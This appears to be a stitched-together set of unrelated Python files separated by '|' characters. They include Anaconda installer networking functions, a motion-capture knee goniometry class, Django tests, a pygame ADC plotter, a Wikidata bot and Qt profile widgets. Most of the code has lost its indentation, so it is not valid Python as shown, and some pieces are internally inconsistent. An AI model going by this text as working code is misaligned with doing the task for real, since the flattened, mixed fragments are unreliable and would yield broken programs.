log.warning("autoconnectFCoEDevices: ifcfg file for %s not found", devname)
continue
ifcfg = IfcfgFile(ifcfg_path)
ifcfg.read()
ifcfg.set(('ONBOOT', 'yes'))
ifcfg.write()
log.debug("setting ONBOOT=yes for network device %s used by fcoe", devname)
for nd in ksdata.network.network:
if nd.device == devname:
nd.onboot = True
break
def usedByFCoE(iface, storage):
for d in storage.devices:
if (isinstance(d, FcoeDiskDevice) and
d.nic == iface):
return True
return False
def write_sysconfig_network(rootpath, overwrite=False):
cfgfile = os.path.normpath(rootpath + networkConfFile)
if (os.path.isfile(cfgfile) and not overwrite):
return False
with open(cfgfile, "w") as f:
f.write("# Created by anaconda\n")
return True
def write_network_config(storage, ksdata, instClass, rootpath):
# overwrite previous settings for LiveCD or liveimg installations
overwrite = flags.livecdInstall or ksdata.method.method == "liveimg"
write_hostname(rootpath, ksdata, overwrite=overwrite)
set_hostname(ksdata.network.hostname)
write_sysconfig_network(rootpath, overwrite=overwrite)
disableIPV6(rootpath)
copyIfcfgFiles(rootpath)
copyDhclientConfFiles(rootpath)
copyFileToPath("/etc/resolv.conf", rootpath, overwrite=overwrite)
instClass.setNetworkOnbootDefault(ksdata)
autostartFCoEDevices(rootpath, storage, ksdata)
def update_hostname_data(ksdata, hostname):
log.debug("updating host name %s", hostname)
hostname_found = False
for nd in ksdata.network.network:
if nd.hostname:
nd.hostname = hostname
hostname_found = True
if not hostname_found:
nd = hostname_ksdata(hostname)
ksdata.network.network.append(nd)
def get_device_name(network_data):
"""
Find the first network device which matches the kickstart specification.
:param network_data: A pykickstart NetworkData object
:returns: a string naming a physical device, or "" meaning none matched
:rtype: str
"""
ksspec = network_data.device or ""
dev_name = ks_spec_to_device_name(ksspec)
if not dev_name:
return ""
if dev_name not in nm.nm_devices():
if not any((network_data.vlanid, network_data.bondslaves, network_data.teamslaves, network_data.bridgeslaves)):
return ""
if network_data.vlanid:
network_data.parent = dev_name
dev_name = network_data.interfacename or default_ks_vlan_interface_name(network_data.parent, network_data.vlanid)
return dev_name
def setOnboot(ksdata):
updated_devices = []
for network_data in ksdata.network.network:
devname = get_device_name(network_data)
if not devname:
log.warning("network: set ONBOOT: --device %s does not exist", network_data.device)
continue
updated_devices.append(devname)
try:
nm.nm_update_settings_of_device(devname, [['connection', 'autoconnect', network_data.onboot, None]])
except (nm.SettingsNotFoundError, nm.UnknownDeviceError) as e:
log.debug("setOnboot: %s", e)
return updated_devices
def apply_kickstart(ksdata):
applied_devices = []
for i, network_data in enumerate(ksdata.network.network):
# TODO: wireless not supported yet
if network_data.essid:
continue
dev_name = get_device_name(network_data)
if not dev_name:
log.warning("network: apply kickstart: --device %s does not exist", network_data.device)
continue
ifcfg_path = find_ifcfg_file_of_device(dev_name)
if ifcfg_path:
with open(ifcfg_path, 'r') as f:
# If we have kickstart ifcfg from initramfs
if "Generated by parse-kickstart" in f.read():
# and we should activate the device
if i == 0 or network_data.activate:
ifcfg = IfcfgFile(ifcfg_path)
ifcfg.read()
con_uuid = ifcfg.get("UUID")
# and the ifcfg had not been already applied to device by NM
if con_uuid != nm.nm_device_active_con_uuid(dev_name):
# apply it overriding configuration generated by NM
# taking over connection activated in initramfs
log.debug("network: kickstart - reactivating device %s with %s", dev_name, con_uuid)
try:
nm.nm_activate_device_connection(dev_name, con_uuid)
except nm.UnknownConnectionError:
log.warning("network: kickstart - can't activate connection %s on %s",
con_uuid, dev_name)
continue
# If we don't have kickstart ifcfg from initramfs the command was added
# in %pre section after switch root, so apply it now
applied_devices.append(dev_name)
if ifcfg_path:
# if the device was already configured in initramfs update the settings
log.debug("network: pre kickstart - updating settings of device %s", dev_name)
con_uuid = update_settings_with_ksdata(dev_name, network_data)
added_connections = [(con_uuid, dev_name)]
else:
log.debug("network: pre kickstart - adding connection for %s", dev_name)
# Virtual devices (eg vlan, bond) return dev_name == None
added_connections = add_connection_for_ksdata(network_data, dev_name)
if network_data.activate:
for con_uuid, dev_name in added_connections:
try:
nm.nm_activate_device_connection(dev_name, con_uuid)
except (nm.UnknownConnectionError, nm.UnknownDeviceError) as e:
log.warning("network: pre kickstart: can't activate connection %s on %s: %s",
con_uuid, dev_name, e)
return applied_devices
def networkInitialize(ksdata):
if not can_touch_runtime_system("networkInitialize", touch_live=True):
return
log.debug("network: devices found %s", nm.nm_devices())
logIfcfgFiles("network initialization")
devnames = apply_kickstart(ksdata)
if devnames:
msg = "kickstart pre section applied for devices %s" % devnames
log.debug("network: %s", msg)
logIfcfgFiles(msg)
devnames = dumpMissingDefaultIfcfgs()
if devnames:
msg = "missing ifcfgs created for devices %s" % devnames
log.debug("network: %s", msg)
logIfcfgFiles(msg)
# For kickstart network --activate option we set ONBOOT=yes
# in dracut to get devices activated by NM. The real network --onboot
# value is set here.
devnames = setOnboot(ksdata)
if devnames:
msg = "setting real kickstart ONBOOT value for devices %s" % devnames
log.debug("network: %s", msg)
logIfcfgFiles(msg)
if ksdata.network.hostname is None:
hostname = getHostname()
update_hostname_data(ksdata, hostname)
def _get_ntp_servers_from_dhcp(ksdata):
"""Check if some NTP servers were returned from DHCP and set them
    to ksdata (if no NTP servers were specified in the kickstart)"""
ntp_servers = nm.nm_ntp_servers_from_dhcp()
log.info("got %d NTP servers from DHCP", len(ntp_servers))
hostnames = []
for server_address in ntp_servers:
try:
hostname = socket.gethostbyaddr(server_address)[0]
except socket.error:
# getting hostname failed, just use the address returned from DHCP
log.debug("getting NTP server host name failed for address: %s",
server_address)
hostname = server_address
hostnames.append(hostname)
# check if some NTP servers were specified from kickstart
if not ksdata.timezone.ntpservers \
and not (flags.imageInstall or flags.dirInstall):
# no NTP servers were specified, add those from DHCP
ksdata.timezone.ntpservers = hostnames
def _wait_for_connecting_NM():
"""If NM is in connecting state, wait for connection.
    :return: ``True`` if NM has got a connection, otherwise ``False``
:rtype: bool
"""
if nm.nm_is_connected():
return True
if nm.nm_is_connecting():
log.debug("waiting for connecting NM (dhcp?)")
else:
return False
i = 0
while nm.nm_is_connecting() and i < constants.NETWORK_CONNECTION_TIMEOUT:
i += constants.NETWORK_CONNECTED_CHECK_INTERVAL
time.sleep(constants.NETWORK_CONNECTED_CHECK_INTERVAL)
if nm.nm_is_connected():
log.debug("connected, waited %d seconds", i)
return True
log.debug("not connected, waited %d of %d secs", i, constants.NETWORK_CONNECTION_TIMEOUT)
return False
def wait_for_network_devices(devices, timeout=constants.NETWORK_CONNECTION_TIMEOUT):
devices = set(devices)
i = 0
log.debug("waiting for connection of devices %s for iscsi", devices)
while i < timeout:
if not devices - set(nm.nm_activated_devices()):
return True
i += 1
time.sleep(1)
return False
def wait_for_connecting_NM_thread(ksdata):
"""This function is called from a thread which is run at startup
to wait for Network Manager to connect."""
# connection (e.g. auto default dhcp) is activated by NM service
connected = _wait_for_connecting_NM()
if connected:
if ksdata.network.hostname == DEFAULT_HOSTNAME:
hostname = getHostname()
update_hostname_data(ksdata, hostname)
_get_ntp_servers_from_dhcp(ksdata)
with network_connected_condition:
global network_connected
network_connected = connected
network_connected_condition.notify_all()
def wait_for_connectivity(timeout=constants.NETWORK_CONNECTION_TIMEOUT):
"""Wait for network connectivty to become available
:param timeout: how long to wait in seconds
:type timeout: integer of float"""
connected = False
network_connected_condition.acquire()
# if network_connected is None, network connectivity check
# has not yet been run or is in progress, so wait for it to finish
if network_connected is None:
# wait releases the lock and reacquires it once the thread is unblocked
network_connected_condition.wait(timeout=timeout)
connected = network_connected
# after wait() unblocks, we get the lock back,
# so we need to release it
network_connected_condition.release()
return connected
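# --- Illustrative standalone sketch (not part of this module's logic,
# stdlib only) of the Condition pattern used by wait_for_connecting_NM_thread()
# and wait_for_connectivity() above: the worker publishes its result under
# the lock and notifies, while callers block with a timeout and then read
# the shared flag.
import threading

_demo_result = None
_demo_cond = threading.Condition()

def _demo_worker():
    global _demo_result
    with _demo_cond:
        _demo_result = True            # pretend the connectivity check succeeded
        _demo_cond.notify_all()        # wake up every waiter

def _demo_wait_for_result(timeout=5):
    with _demo_cond:
        if _demo_result is None:       # check not finished yet: block until notified
            _demo_cond.wait(timeout=timeout)
        return _demo_result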
def status_message():
""" A short string describing which devices are connected. """
msg = _("Unknown")
state = nm.nm_state()
if state == NetworkManager.State.CONNECTING:
msg = _("Connecting...")
elif state == NetworkManager.State.DISCONNECTING:
msg = _("Disconnecting...")
else:
active_devs = [d for d in nm.nm_activated_devices()
if not is_libvirt_device(d)]
if active_devs:
slaves = {}
ssids = {}
# first find slaves and wireless aps
for devname in active_devs:
slaves[devname] = nm.nm_device_slaves(devname) or []
if nm.nm_device_type_is_wifi(devname):
ssids[devname] = nm.nm_device_active_ssid(devname) or ""
all_slaves = set(itertools.chain.from_iterable(slaves.values()))
nonslaves = [dev for dev in active_devs if dev not in all_slaves]
if len(nonslaves) == 1:
devname = nonslaves[0]
if nm.nm_device_type_is_ethernet(devname):
msg = _("Wired (%(interface_name)s) connected") \
% {"interface_name": devname}
elif nm.nm_device_type_is_wifi(devname):
msg = _("Wireless connected to %(access_point)s") \
% {"access_point" : ssids[devname]}
elif nm.nm_device_type_is_bond(devname):
msg = _("Bond %(interface_name)s (%(list_of_slaves)s) connected") \
% {"interface_name": devname, \
"list_of_slaves": ",".join(slaves[devname])}
elif nm.nm_device_type_is_team(devname):
msg = _("Team %(interface_name)s (%(list_of_slaves)s) connected") \
% {"interface_name": devname, \
"list_of_slaves": ",".join(slaves[devname])}
elif nm.nm_device_type_is_bridge(devname):
msg = _("Bridge %(interface_name)s (%(list_of_slaves)s) connected") \
% {"interface_name": devname, \
"list_of_slaves": ",".join(slaves[devname])}
elif nm.nm_device_type_is_vlan(devname):
parent = nm.nm_device_setting_value(devname, "vlan", "parent")
vlanid = nm.nm_device_setting_value(devname, "vlan", "id")
msg = _("VLAN %(interface_name)s (%(parent_device)s, ID %(vlanid)s) connected") \
% {"interface_name": devname, "parent_device": parent, "vlanid": vlanid}
elif len(nonslaves) > 1:
devlist = []
for devname in nonslaves:
if nm.nm_device_type_is_ethernet(devname):
devlist.append("%s" % devname)
elif nm.nm_device_type_is_wifi(devname):
devlist.append("%s" % ssids[devname])
elif nm.nm_device_type_is_bond(devname):
devlist.append("%s (%s)" % (devname, ",".join(slaves[devname])))
elif nm.nm_device_type_is_team(devname):
devlist.append("%s (%s)" % (devname, ",".join(slaves[devname])))
elif nm.nm_device_type_is_bridge(devname):
devlist.append("%s (%s)" % (devname, ",".join(slaves[devname])))
elif nm.nm_device_type_is_vlan(devname):
devlist.append("%s" % devname)
msg = _("Connected: %(list_of_interface_names)s") \
% {"list_of_interface_names": ", ".join(devlist)}
else:
msg = _("Not connected")
if not nm.nm_devices():
msg = _("No network devices available")
return msg
def default_ks_vlan_interface_name(parent, vlanid):
return "%s.%s" % (parent, vlanid)
def has_some_wired_autoconnect_device():
"""Is there a wired network device with autoconnect?"""
for dev in nm.nm_devices():
if nm.nm_device_type_is_wifi(dev):
continue
try:
onboot = nm.nm_device_setting_value(dev, "connection", "autoconnect")
except nm.SettingsNotFoundError:
continue
# None means the setting was not found, which means NM is using
# default (True)
        if onboot or onboot is None:
return True
return False
def update_onboot_value(devname, value, ksdata):
"""Update onboot value in ifcfg files and ksdata"""
log.debug("network: setting ONBOOT value of %s to %s", devname, value)
ifcfg_path = find_ifcfg_file_of_device(devname, root_path=iutil.getSysroot())
if not ifcfg_path:
log.debug("network: can't find ifcfg file of %s", devname)
return
ifcfg = IfcfgFile(ifcfg_path)
ifcfg.read()
    ifcfg.set(('ONBOOT', 'yes' if value else 'no'))
    ifcfg.write()
    for nd in ksdata.network.network:
        if nd.device == devname:
            nd.onboot = value
break
def is_using_team_device():
return any(nm.nm_device_type_is_team(d) for d in nm.nm_devices())
def is_libvirt_device(iface):
return iface.startswith("virbr")
|
from random import random
class Cell:
def __init__(self, fitness):
self.fitness = fitness
self.survivability = self.fitness
def live(self, environment_modifier):
self.survivability = self.fitness + environment_modifier
|
"""
UNIVERSIDAD DE COSTA RICA Escuela de Ingeniería Eléctrica
IE0499 | Proyecto Eléctrico
Mario Alberto Castresana Avendaño
A41267
Programa: BVH_TuneUp
-------------------------------------------------------------------------------
archivo: Leg.py
descripción:
Este archivo contiene la clase Leg, la cual se utiliza para implementar la
rodilla izquierda y la derecha. Los estudios de goniometría para este hueso
se basan en los siguientes límites de los ángulos de Euler:
Z torsión no válida
X Flexión + y extensión -
Y rotación no válida
"""
from Bone import Bone
class Leg(Bone):
"""
    This subclass implements the goniometry study for the knees in the
    BVH skeleton. The hierarchy calls them "Leg".
"""
def __init__(self, ID=' ', Zp=0, Xp=0, Yp=0):
"""
        This bone is initialized with the following parameters:
        ID: bone identifier, e.g. left/right
        Each bone position is defined by a vector of Euler angles
        (Z, X, Y), each of which has a specific position inside the
        MOTION-section array of the BVH.
        Zp: index into the MOTION array holding this bone's Euler Z angle
        Xp: index into the MOTION array holding this bone's Euler X angle
        Yp: index into the MOTION array holding this bone's Euler Y angle
"""
self.ID = ID
self.Zp = Zp
self.Xp = Xp
self.Yp = Yp
        # call the superclass constructor to get access to all the
        # goniometry attributes
Bone.__init__(self,
Name='Rodilla',
Zmin=-0.200000,
Zmax=0.200000,
Xmin=0.000000,
Xmax=150.000000,
Ymin=-1.000000,
Ymax=1.000000)
def Goniometry_check(self, MOTION, frame):
"""
        Description:
        This function compares the Euler angle values a bone has in a
        given frame against that particular bone's goniometric limits.
        If any Euler angle exceeds the limits of human movement, a glitch
        is reported for that frame and corrected in the MOTION array.
        Arguments:
        MOTION: 156-element array holding every bone's Euler angles for a
        given frame. The bone order is given by the HIERARCHY section of
        the BVH.
        frame: the MoCap video frame being analyzed
"""
        # First, read the value of each Euler angle
        Zeuler = MOTION[self.Zp]
        Xeuler = MOTION[self.Xp]
        Yeuler = MOTION[self.Yp]
        glitch = False
        # Exempt is set when axis-rotation problems are detected on the
        # knees' Z and Y axes
        Exempt = False
        ErrorMsg = ' has glitches of '
        # Variables to test whether the axes rotated and the skeleton is crouched
        rodilla_flex = Xeuler > 13.0 or Xeuler < -15.0
        y_rot = Yeuler > 20.0 or Yeuler < -20.0
        z_rot = Zeuler > 40.0 or Zeuler < -40.0
        Rotacion_ejes = y_rot or z_rot
if rodilla_flex and Rotacion_ejes:
Exempt = True
if Exempt:
            # There are two distinct goniometric tests depending on how far
            # the knees are flexed. When the knees have a flexion angle
            # greater than 45° or the Z and Y axes have rotated, the Z and Y
            # mobility limits must be widened. This is due to the behavior
            # of the bones in the BVH, which rotate the Y and Z axes to
            # represent the movements of a crouched skeleton. It happens
            # because the cameras lose the bone's orientation on the Z and
            # Y axes.
            # test the new Z limits
            if Zeuler < -160.000000:
                # no Z restriction is applied to MOTION[self.Zp]
                glitch = True
                ErrorMsg += 'sensor orientation loss on Z- | '
            if Zeuler > 160.000000:
                # no Z restriction is applied to MOTION[self.Zp]
                glitch = True
                ErrorMsg += 'sensor orientation loss on Z+ | '
            # now test the new X limits
            if Xeuler < -150.000000:
                # no X restriction is applied to MOTION[self.Xp]
                glitch = True
                ErrorMsg += 'sensor orientation loss on X- | '
            if Xeuler > 150.000000:
                # no X restriction is applied to MOTION[self.Xp]
                glitch = True
                ErrorMsg += 'sensor orientation loss on X+ | '
            # now test the new Y limits
            if Yeuler < -105.000000:
                # no Y restriction is applied to MOTION[self.Yp]
                glitch = True
                ErrorMsg += 'sensor orientation loss on Y- | '
            if Yeuler > 105.000000:
                # no Y restriction is applied to MOTION[self.Yp]
                glitch = True
                ErrorMsg += 'sensor orientation loss on Y+ | '
else:
            # test the Z limits
            if Zeuler < self.Zmin:
                MOTION[self.Zp] = self.Zmin
                glitch = True
                ErrorMsg += 'torsion | '
            if Zeuler > self.Zmax:
                MOTION[self.Zp] = self.Zmax
                glitch = True
                ErrorMsg += 'torsion | '
            # now test the X limits
            if Xeuler < self.Xmin:
                MOTION[self.Xp] = self.Xmin
                glitch = True
                ErrorMsg += 'extension | '
            if Xeuler > self.Xmax:
                MOTION[self.Xp] = self.Xmax
                glitch = True
                ErrorMsg += 'flexion | '
            # now test the Y limits
            if Yeuler < self.Ymin:
                MOTION[self.Yp] = self.Ymin
                glitch = True
                ErrorMsg += 'internal rotation | '
            if Yeuler > self.Ymax:
                MOTION[self.Yp] = self.Ymax
                glitch = True
                ErrorMsg += 'external rotation | '
if glitch:
self.Report_glitch(ErrorMsg, frame)
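# Minimal usage sketch (assumed data, not part of the original project):
# check one frame's right-knee angles against the goniometric limits.
# Indices 3, 4, 5 into the MOTION array are hypothetical Z/X/Y positions,
# and the Bone base class is assumed to provide Report_glitch().
if __name__ == '__main__':
    right_knee = Leg(ID='right', Zp=3, Xp=4, Yp=5)
    motion = [0.0] * 156
    motion[4] = 170.0                 # flexion beyond the 150-degree limit
    right_knee.Goniometry_check(motion, frame=1)
    print(motion[4])                  # clamped back to Xmax (150.0)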
|
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('cadeau', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='artikel',
name='foto',
field=models.ImageField(upload_to='', blank=True, verbose_name='media/img'),
),
]
|
from django.test import TestCase
from ..models import Setting
class SettingModelTests(TestCase):
def test_real_value(self):
"""setting returns real value correctyly"""
setting_model = Setting(python_type='list', dry_value='')
self.assertEqual(setting_model.value, [])
setting_model = Setting(python_type='list',
dry_value='Arthur,Lancelot,Patsy')
self.assertEqual(setting_model.value,
['Arthur', 'Lancelot', 'Patsy'])
setting_model = Setting(python_type='list',
default_value='Arthur,Patsy')
self.assertEqual(setting_model.value,
['Arthur', 'Patsy'])
setting_model = Setting(python_type='list',
dry_value='Arthur,Robin,Patsy',
default_value='Arthur,Patsy')
self.assertEqual(setting_model.value,
['Arthur', 'Robin', 'Patsy'])
def test_set_value(self):
"""setting sets value correctyly"""
setting_model = Setting(python_type='int',
dry_value='42',
default_value='9001')
setting_model.value = 3000
self.assertEqual(setting_model.value, 3000)
self.assertEqual(setting_model.dry_value, '3000')
setting_model.value = None
self.assertEqual(setting_model.value, 9001)
self.assertEqual(setting_model.dry_value, None)
def test_field_extra(self):
"""field extra is set correctly"""
setting_model = Setting()
test_extra = {}
setting_model.field_extra = test_extra
self.assertEqual(setting_model.field_extra, test_extra)
        test_extra = {'min_length': 5, 'max_length': 12}
setting_model.field_extra = test_extra
self.assertEqual(setting_model.field_extra, test_extra)
|
import json
import pytest
from boltons.iterutils import same
from ..pool import DEFAULT_MANAGER_IDS
from .test_cli import CLISubCommandTests, CLITableTests
@pytest.fixture
def subcmd():
return "installed"
class TestInstalled(CLISubCommandTests, CLITableTests):
@pytest.mark.parametrize("mid", DEFAULT_MANAGER_IDS)
def test_single_manager(self, invoke, subcmd, mid):
result = invoke("--manager", mid, subcmd)
assert result.exit_code == 0
self.check_manager_selection(result, {mid})
def test_json_parsing(self, invoke, subcmd):
result = invoke("--output-format", "json", subcmd)
assert result.exit_code == 0
data = json.loads(result.stdout)
assert set(data).issubset(DEFAULT_MANAGER_IDS)
for manager_id, info in data.items():
assert isinstance(manager_id, str)
assert isinstance(info, dict)
assert set(info) == {"errors", "id", "name", "packages"}
assert isinstance(info["errors"], list)
if info["errors"]:
assert same(map(type, info["errors"]), str)
assert isinstance(info["id"], str)
assert isinstance(info["name"], str)
assert isinstance(info["packages"], list)
assert info["id"] == manager_id
for pkg in info["packages"]:
assert isinstance(pkg, dict)
assert set(pkg) == {"id", "installed_version", "name"}
assert isinstance(pkg["id"], str)
assert isinstance(pkg["installed_version"], str)
assert isinstance(pkg["name"], str)
|
import gettext
from zope.interface import implements
from flumotion.admin.assistant.interfaces import IEncoderPlugin
from flumotion.admin.assistant.models import AudioEncoder
from flumotion.admin.gtk.basesteps import AudioEncoderStep
__version__ = "$Rev: 7268 $"
_ = gettext.gettext
class SpeexAudioEncoder(AudioEncoder):
componentType = 'speex-encoder'
def __init__(self):
super(SpeexAudioEncoder, self).__init__()
self.properties.bitrate = 11
def getProperties(self):
properties = super(SpeexAudioEncoder, self).getProperties()
properties.bitrate *= 1000
return properties
class SpeexStep(AudioEncoderStep):
name = 'Speex encoder'
title = _('Speex Encoder')
sidebarName = _('Speex')
componentType = 'speex'
icon = 'xiphfish.png'
docSection = 'help-configuration-assistant-encoder-speex'
docAnchor = ''
docVersion = 'local'
# WizardStep
def setup(self):
# Should be 2150 instead of 3 -> 3000
self.bitrate.set_range(3, 30)
self.bitrate.set_value(11)
self.bitrate.data_type = int
self.add_proxy(self.model.properties, ['bitrate'])
def workerChanged(self, worker):
self.model.worker = worker
self.wizard.requireElements(worker, 'speexenc')
class SpeexWizardPlugin(object):
implements(IEncoderPlugin)
def __init__(self, wizard):
self.wizard = wizard
self.model = SpeexAudioEncoder()
def getConversionStep(self):
return SpeexStep(self.wizard, self.model)
|
import pygame, os, time, random
import spidev
pygame.init()
os.environ['SDL_VIDEO_WINDOW_POS'] = 'center'
pygame.display.set_caption("Bounce Test")
pygame.event.set_allowed(None)
pygame.event.set_allowed([pygame.KEYDOWN,pygame.QUIT])
screenWidth = 1000 ; screenHeight = 230
screen = pygame.display.set_mode([screenWidth, screenHeight], 0, 32)
textHeight= 20
font = pygame.font.Font(None, textHeight)
backCol = (150,255,150) # background colour
inBuf = [ 0, 0]
def main():
n=0
loadResource()
while(1):
time.sleep(0.001)
checkForEvent()
readSensor()
display(n)
n +=1
if n > screenWidth:
n=0
lastX = -1; lastY = 0
            pygame.draw.rect(screen,backCol,(0,0,screenWidth,screenHeight+2),0)
def display(n):
global lastX,lastY
col = (180,64,0)
y0 = ch0Low - inBuf[0]//9
y1 = ch1Low - inBuf[1]//9
if n != 0:
pygame.draw.line(screen,col,(lastX ,lastY[0] ), (n ,y0 ),2)
pygame.draw.line(screen,(0,64,180),(lastX ,lastY[1] ), (n ,y1 ),2)
lastX = n
lastY[0] = y0 ; lastY[1] = y1
pygame.display.update()
def readSensor():
for i in range(0,2):
adc = spi.xfer2([1,(8+i)<<4,0]) # request channel
inBuf[i] = (adc[1] & 3)<<8 | adc[2] # join two bytes together
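# Assuming the ADC is an MCP3008 (which this transfer pattern matches):
# byte 1 is the start bit, byte 2 ((8 + channel) << 4) selects the channel,
# and the 10-bit result spans the low two bits of the second reply byte
# plus all of the third. A small helper expressing the same protocol:
def readADC(channel):
    adc = spi.xfer2([1, (8 + channel) << 4, 0])
    return (adc[1] & 3) << 8 | adc[2]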
def loadResource():
global spi,lastX,lastY,ch0Low,ch1Low
spi = spidev.SpiDev()
spi.open(0,0)
spi.max_speed_hz=1000000
    pygame.draw.rect(screen,backCol,(0,0,screenWidth,screenHeight),0)
lastX = -1 ; lastY = [0,0]
    ch0Low = screenHeight // 2 - 2
    ch1Low = screenHeight - 2
def terminate(): # close down the program
pygame.quit() # close pygame
os._exit(1)
def checkForEvent(): # see if we need to quit
event = pygame.event.poll()
if event.type == pygame.QUIT :
terminate()
if event.type == pygame.KEYDOWN :
if event.key == pygame.K_ESCAPE :
terminate()
if event.key == pygame.K_d : # screen dump
os.system("scrot")
if __name__ == '__main__':
main()
|
from Step import Step
class Welcome(Step):
def show(self):
self.render('Welcome.tmpl')
|
import sys, traceback, Ice
Ice.loadSlice('Latency.ice')
import Demo
class Server(Ice.Application):
def run(self, args):
if len(args) > 1:
print self.appName() + ": too many arguments"
return 1
adapter = self.communicator().createObjectAdapter("Latency")
adapter.add(Demo.Ping(), self.communicator().stringToIdentity("ping"))
adapter.activate()
self.communicator().waitForShutdown()
return 0
app = Server()
sys.exit(app.main(sys.argv, "config.server"))
|
import pywikibot
from pywikibot import pagegenerators
from .query_store import QueryStore
from .wikidata import WikidataEntityBot
class LabelsFixingBot(WikidataEntityBot):
use_from_page = False
def __init__(self, generator, **kwargs):
self.available_options.update({
'always': True,
'limit': 50,
})
super().__init__(**kwargs)
self.store = QueryStore()
self._generator = generator or self.custom_generator()
self.summary = 'remove prefix from [en] label'
@property
def generator(self):
return pagegenerators.PreloadingEntityGenerator(self._generator)
def custom_generator(self):
query = self.store.build_query('commons_labels',
limit=self.opt['limit'])
return pagegenerators.WikidataSPARQLPageGenerator(query, site=self.repo)
def treat_page_and_item(self, page, item):
if any(cl.target_equals('Q4167836') for cl in item.claims.get('P31', [])):
return
if item.getSitelink('commonswiki').startswith('Category:'):
if item.labels['en'].startswith('Category:'):
data = {'en': item.labels['en'][len('Category:'):]}
self.user_edit_entity(item, {'labels': data},
summary=self.summary)
def main(*args):
options = {}
local_args = pywikibot.handle_args(args)
site = pywikibot.Site()
genFactory = pagegenerators.GeneratorFactory(site=site)
for arg in local_args:
if genFactory.handle_arg(arg):
continue
if arg.startswith('-'):
arg, sep, value = arg.partition(':')
if value != '':
options[arg[1:]] = value if not value.isdigit() else int(value)
else:
options[arg[1:]] = True
generator = genFactory.getCombinedGenerator()
bot = LabelsFixingBot(generator=generator, site=site, **options)
bot.run()
if __name__ == '__main__':
main()
|
import random, os
from vg import config
from vg import utils
class SoundManager:
sounds = [] #constant across all instances
sets = {}
def __init__(self, filename=config.SOUND_YAML):
if not self.sounds:
self.load(filename)
def load(self, filename):
"""Load up the class copies of yaml data"""
self.sounds[:] = utils.yaml_load(filename)
for x in self.sounds:
for s in x['suitability']:
sounds = self.sets.setdefault(s, [])
sounds.append(x)
def pick_sounds(self, sound_group, exclude):
"""return a dictionary mapping event types to lists of sound
file names. sound_group is the kind of team asking for the
sounds, and exclude is a set of sound types/directories not to
        be used (i.e., ones already used for other teams' sounds)."""
#try a few times to get one from a new set. It is not
#impossible for a set to repeat, but is unlikely.
for i in range(10):
c = random.choice(self.sets.get(sound_group, self.sounds))
if c['directory'] not in exclude:
break
# make an independent copy, with directory prepended.
join = os.path.join
exclude.add(c['directory'])
sounds = {}
for k, v in c['sounds'].items():
sounds[k] = [ join(c['directory'], x) for x in v ]
return sounds
|
import ldac
import numpy as np
import pdb
class LDA(object):
"""LDA Class"""
def __init__(self, this):
self.this = this
self.ext = None
def __del__(self):
print("Destructor called!")
ldac.delete(self.this, self.ext)
def __reduce__(self):
buff = self.serialize()
return (LDA.from_string, (buff,))
@classmethod
def init(cls, k, iters, vocab, data=None):
if isinstance(vocab, int):
if vocab < 0:
raise ValueError('Vocab size must be non-negative!')
            vocab = ['w' + str(i) for i in range(vocab)]
elif isinstance(vocab, list):
if len(vocab) > 0:
if not isinstance(vocab[0], str):
                    raise ValueError('Vocab must be a list of strings!')
else:
raise NotImplementedError('This type of vocab is not implemented')
ptr = ldac.new(k, iters, vocab)
return cls(ptr)
@classmethod
def from_string(cls, buff):
ptr = ldac.deserialize(buff)
return cls(ptr)
def fit(self, trngdata, testdata):
return ldac.fit(self.this, trngdata, testdata)
def evaluate(self, data):
return ldac.evaluate(self.this, data)
def predict(self, data):
pass
def get_topic_matrix(self):
if self.ext is None:
self.ext = ldac.topic_matrix(self.this)
return self.ext
def get_top_words(self, number=15):
return ldac.top_words(self.this, number)
def serialize(self):
return ldac.serialize(self.this)
|
from functools import partial
import uuid
from PyQt5 import (
QtCore,
QtGui,
QtWidgets,
)
from picard.const import DEFAULT_PROFILE_NAME
from picard.util import unique_numbered_title
from picard.ui import HashableListWidgetItem
class ProfileListWidget(QtWidgets.QListWidget):
def contextMenuEvent(self, event):
item = self.itemAt(event.x(), event.y())
if item:
menu = QtWidgets.QMenu(self)
rename_action = QtWidgets.QAction(_("Rename profile"), self)
rename_action.triggered.connect(partial(self.editItem, item))
menu.addAction(rename_action)
remove_action = QtWidgets.QAction(_("Remove profile"), self)
remove_action.triggered.connect(partial(self.remove_profile, item))
menu.addAction(remove_action)
menu.exec_(event.globalPos())
def keyPressEvent(self, event):
if event.matches(QtGui.QKeySequence.Delete):
self.remove_selected_profile()
elif event.key() == QtCore.Qt.Key_Insert:
self.add_profile()
else:
super().keyPressEvent(event)
def unique_profile_name(self, base_name=None):
if base_name is None:
base_name = _(DEFAULT_PROFILE_NAME)
existing_titles = [self.item(i).name for i in range(self.count())]
return unique_numbered_title(base_name, existing_titles)
def add_profile(self, name=None, profile_id=""):
if name is None:
name = self.unique_profile_name()
list_item = ProfileListWidgetItem(name=name, profile_id=profile_id)
list_item.setCheckState(QtCore.Qt.Checked)
self.insertItem(0, list_item)
self.setCurrentItem(list_item, QtCore.QItemSelectionModel.Clear
| QtCore.QItemSelectionModel.SelectCurrent)
def remove_selected_profile(self):
items = self.selectedItems()
if items:
self.remove_profile(items[0])
def remove_profile(self, item):
row = self.row(item)
msg = _("Are you sure you want to remove this profile?")
reply = QtWidgets.QMessageBox.question(self, _('Confirm Remove'), msg,
QtWidgets.QMessageBox.Yes, QtWidgets.QMessageBox.No)
if item and reply == QtWidgets.QMessageBox.Yes:
item = self.takeItem(row)
del item
class ProfileListWidgetItem(HashableListWidgetItem):
"""Holds a profile's list and text widget properties"""
def __init__(self, name=None, enabled=True, profile_id=""):
super().__init__(name)
self.setFlags(self.flags() | QtCore.Qt.ItemIsUserCheckable | QtCore.Qt.ItemIsEditable)
if name is None:
name = _(DEFAULT_PROFILE_NAME)
self.setText(name)
self.setCheckState(QtCore.Qt.Checked if enabled else QtCore.Qt.Unchecked)
if not profile_id:
profile_id = str(uuid.uuid4())
self.profile_id = profile_id
@property
def pos(self):
return self.listWidget().row(self)
@property
def name(self):
return self.text()
@property
def enabled(self):
return self.checkState() == QtCore.Qt.Checked
def get_all(self):
# tuples used to get pickle dump of settings to work
return (self.pos, self.name, self.enabled, self.profile_id)
def get_dict(self):
return {
'position': self.pos,
'title': self.name,
'enabled': self.enabled,
'id': self.profile_id,
}
|
from __future__ import print_function
try:
PermissionError
except NameError:
PermissionError = OSError
import unittest
import os
import datetime
from cachefile import Cachefile
class TestCache(Cachefile):
def __init__(self, cachedir):
super(TestCache, self).__init__(cachedir)
def apply_types(self, row):
row[self.TIME] = self.parse_time(row[self.TIME])
